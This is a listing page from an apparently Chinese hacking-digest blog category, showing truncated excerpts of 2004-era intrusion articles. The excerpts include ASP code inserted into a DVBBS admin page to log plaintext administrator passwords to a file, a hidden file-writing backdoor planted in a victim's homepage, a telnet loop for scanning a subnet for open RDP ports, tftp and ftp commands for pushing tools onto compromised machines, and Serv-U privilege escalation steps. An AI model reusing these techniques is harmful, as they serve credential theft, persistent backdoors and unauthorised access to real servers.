文摘·黑客攻防
文章平均质量分 65
secteam
这个作者很懒,什么都没留下…
展开
-
修改admin_index.asp得到明文DVBBS后台密码
在"username=trim(replace(request("username")这行后面 Dim fsoObject Dim tsObject Set fsoObject = Server.CreateObject("Scripting.FileSystemObject") set tsObject = fsoObject.CreateTextFile(Server.MapPath("ok.原创 2004-10-15 17:18:00 · 6363 阅读 · 0 评论 -
跨站Script攻击 Author: Hoky.pRo
每当我们想到黑客的时候,黑客往往是这样一幅画像:一个孤独的人,悄悄进入别人的服务器中,进行破坏或者窃取别人的秘密资料。也许他会更改我们的主页,甚者会窃取客户的信用卡号和密码。另外,黑客还会攻击访问我们网站的客户。与此同时,我们的服务器也成了他的帮凶。微软称这种攻击为"跨站script"攻击。而这种攻击大多数都发生在网站动态产生网页的时侯,但黑客的目标并不是你的网站,而是浏览网站的客户。跨站scri原创 2004-11-14 22:32:00 · 1216 阅读 · 0 评论 -
JAVASCRIPT加密解密终级指南
文章作者:icyfoxlovelace/冰狐浪子[EST]信息来源:《黑客防线》 本文一共介绍了七种方法:一:最简单的加密解密二:转义字符"/"的妙用三:使用Microsoft出品的脚本编码器Script Encoder来进行编码 (自创简单解码)四:任意添加NUL空字符(十六进制00H) (自创)五:无用内容混乱以及换行空格TAB大法六:自写解密函数法七:错误的利用 (自创) 在做网页时(其实原创 2004-11-14 01:12:00 · 2222 阅读 · 2 评论 -
四川成都攻防大赛技术细节与个人评论
四川成都攻防大赛技术细节与个人评论本文作者:angel文章性质:原创发布日期:2004-11-5 估计大家都知道这次成都的“天地杯”网络安全攻防大赛的消息了,既然和网络安全有关,估计不少朋友都想知道其中的技术细节,我就说说其中技术细节。至于和我一起参加比赛的人,都是圈内比较出名的人物,机会、优势几乎都在我们这边了,其他我就暂时不说了。圈内也有不少人知道是我们几个参原创 2004-11-06 23:15:00 · 1829 阅读 · 1 评论 -
用DOS命令扫描一个网段的全部端口,不需要任何工具
在win2000下开一个dos窗口,然后执行 for /l %a in (1,1,254) do start /min /low telnet 192.168.0.%a 3389 这样192.168.0.x这个段的所有开放3389端口得主机都会暴露 这条命令执行后 会在任务栏开254个小窗口 然后telnet链接失败的窗口会在大约5秒后自动退出 剩下的窗口就是相对应开放端口的主机了 看一下小窗口的原创 2004-10-20 19:27:00 · 2217 阅读 · 1 评论 -
渗透国内某网络游戏服务器群记实
没什么技术性,只是想说明现状 现在想弄钱的入侵者,似乎热衷于入侵网络游戏服务器,盗出游戏服务器程序或是数据库。国内的网络游戏企业,都应该招受过此损失,有暴露出来的,有没暴露出来的。但游戏企业对安全问题理解都十分片面,狭隘! 当然,不只是网络游戏企业。近一两年来,入侵者乐此不疲,各种商业数据的偷盗在国内几乎快形成一种"圈内产业"。不论是技术性还是行事组织性都与早年不可同日而语。需求与供应在这里似原创 2004-10-20 10:30:00 · 8723 阅读 · 26 评论 -
插入式免杀后门--将后门放到对方主页里
昨天也不知怎就搞到中国域名网的权限了,搞了很久,有自动备份。转入正题:1.随便找他一个页面,然后把如下内容分开插入到它的主页了,注意一下上下文。内容(fso):"" then %>save Success!" %>Save UnSuccess!" %>最好要分开插入!!这样管理员也不容易发现。2.将下内容保存到本地为一个htm,并把action="#",改成你插入到的页面,再添下绝对路原创 2004-10-19 01:06:00 · 1407 阅读 · 1 评论 -
ASP木马配合Serv-U提升权限图文教程
第一步得到一个webshell,找到一个everone权限目录,把提升权限工具传上去,执行命令 第二步,连上去吧 第三步,当然有的机器有pcanywhere了,像这台 下载下来破解 第四步连上去看看,还是win2003 第五步开3389吧 第六步加个用户。 其实在pcanywhere里边也行 工具下载 http://pic.yt-e.com/原创 2004-10-19 01:00:00 · 2555 阅读 · 0 评论 -
突破动力文章上传asp的限制
在入侵动力文章系统,成功进入后台后,也许你会发现,它的后台没有上传ASP的功能,因为动力文章系统的文件过滤是直接写在代码里的。我介绍一种突破这种限制的方法。虽然它禁止了上传ASP,但是我们可以直接写代码啊! 推荐版权信息输入框,框框大比较好写一点^_^。注意,动力文章系统是将这里写入的代码以字符串的形式写道Config.asp里的,所以我们直接复制ASP木马的代码是行不通的。原创 2004-10-19 00:55:00 · 1904 阅读 · 0 评论 -
对一个安全设置比较BT的虚拟主机的安全测试
作者:血汉 文章来源:www.qfaq.com前几天无聊时看到一个木马站,然后就对他进行了一番安全测试,发现是在一个虚拟主机上的,而虚拟主机的安全设置又比较高,我今天就把我是怎么进入这个木马站的经过写出来,里面没有设计到什么技术性的东西,只是把这次的思路说下,因为经验才是最重要的! 首先看了下站.发现是动力的系统,看了下版本MyPower Ver3.51,当时还比较新,注入过滤的比较好,上传原创 2004-10-15 17:09:00 · 1441 阅读 · 0 评论 -
上传方法总结[对入侵很实用]
作者:小虾米 来自:朋友的家现在将本人用于上传的方法进行汇总如下:1. tftp法先在自己某机器上建个tftp服务器,如执行tftpd32.exe,再将文件(sample.exe)上传到别的机器中(肉鸡),肉鸡cmd中执行: tftp -i 服务器ip get sample.exe2. ftp法肉鸡cmd中执行:echo open ftp服务器ip [端口]>ftp.txtecho原创 2004-10-18 19:57:00 · 1494 阅读 · 0 评论 -
SYMANTEC防火墙内核溢出漏洞利用之安全返回法
作者:SoBeIt 来自:https://www.xfocus.net这个漏洞发生在SYMDNS.SYS中,当处理DNS答复时,由于未检验总域名长度,导致可以输入一超长域名导致溢出,溢出发生在RING0、IRQL = 2(DISPATCH_LEVEL)、 进程PID为0(idle进程)的环境下。 一个DNS报文格式如下: "/xEB/x0B" //报文ID,可以随意设原创 2004-10-18 19:56:00 · 943 阅读 · 0 评论 -
直接获取Access、SQL Server等数据库数据
直接获取access、SQL Server等数据库数据Author: MixPST,Ph4nt0m Security Teamhttp://www.ph4nt0m.org当使用SQL注入access的时候,经常会遇到密码为中文、猜不到关键字段名这样的问题。使用本技术就能够很快速的解决这样的问题。本技术最低要求有两条:1.使用access数据库的系统存在SQL注入漏洞;mssql数据库也支持原创 2004-10-18 19:55:00 · 1425 阅读 · 0 评论 -
SQL注入路径问题 作者:孤光剑隐
下午没什么事情 看了看angel写一个路径的问章 找了肉鸡试了半天 费了牛劲了 我发现如果出现 Microsoft OLE DB Provider for SQL Server 错误 80040e07 将 varchar 值 #SharedObjects 转换为数据类型为 int 的列时发生语法错误。 /html/showdetail_new.asp,行 9 这样他的方法就不能用了 #必须原创 2004-11-14 22:38:00 · 1735 阅读 · 1 评论